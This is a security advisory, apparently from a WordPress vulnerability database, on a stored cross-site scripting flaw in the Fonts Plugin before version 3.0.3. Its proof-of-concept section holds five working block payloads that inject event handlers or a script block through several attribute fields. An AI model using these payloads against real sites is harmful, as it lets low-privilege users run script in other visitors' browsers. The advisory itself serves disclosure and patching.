Fonts Plugin < 3.0.3 - Contributor+ Stored Cross-Site Scripting
Description
The plugin does not escape and sanitise some of its block settings, allowing users with as role as low as Contributor to perform Stored Cross-Site Scripting attacks via blockType (combined with content), align, color, variant and fontID argument of a Gutenberg block.
Proof of Concept
As a contributor, put the following code in a post/page while in Code Editor mode
< 3.0.2
<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","content":"Hello, World!","color":"red;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(1+origin)//"} /-->
<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"0","variant":"400","align":"center;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(2+origin)//","content":"Hello, World!"} /-->
<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"Arial;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(origin)//","variant":"400","content":"Hello, World!"} /-->
<!-- wp:olympus-google-fonts/google-fonts {"blockType":"h4","fontID":"Arial","variant":"400;animation-name:twentytwentyone-close-button-transition\u0022 onanimationend=\u0022alert(/Variant/)//","content":"Hello, World!"} /-->
< 3.0.3
<!-- wp:olympus-google-fonts/google-fonts {"blockType":"script","fontID":"0","variant":"400","content":"alert(\u0022xss\u0022)"} /--> Affects Plugins
Fixed in version 3.0.3✓
References
Classification
Miscellaneous
Original Researcher
apple502j
Submitter
apple502j
Verified
Yes
Timeline
Publicly Published
2021-08-23 (about 5 months ago)
Added
2021-08-23 (about 5 months ago)
Last Updated
2021-08-23 (about 5 months ago)